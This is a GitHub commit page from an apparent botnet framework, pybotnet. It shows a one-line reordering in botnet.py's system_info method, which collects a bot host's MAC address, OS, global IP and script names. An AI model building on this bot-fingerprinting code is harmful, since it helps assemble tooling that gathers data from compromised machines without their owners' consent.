Skip to content

Commit

Permalink
move bot_name up, in system info
Browse files Browse the repository at this point in the history
  • Loading branch information
onionj committed Aug 5, 2022
1 parent 78bf884 commit ef36226
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion pybotnet/botnet.py
Original file line number Diff line number Diff line change
Expand Up @@ -186,9 +186,9 @@ def system_info(self, minimal=False):
minimal_info = {
"scripts_name": list(self.scripts),
"mac_addres": uuid.getnode(),
"bot_name": self.BOT_NAME,
"os": platform.system(),
"global_ip": get_global_ip(),
"bot_name": self.BOT_NAME,
}

if minimal:
Expand Down

0 comments on commit ef36226

Please sign in to comment.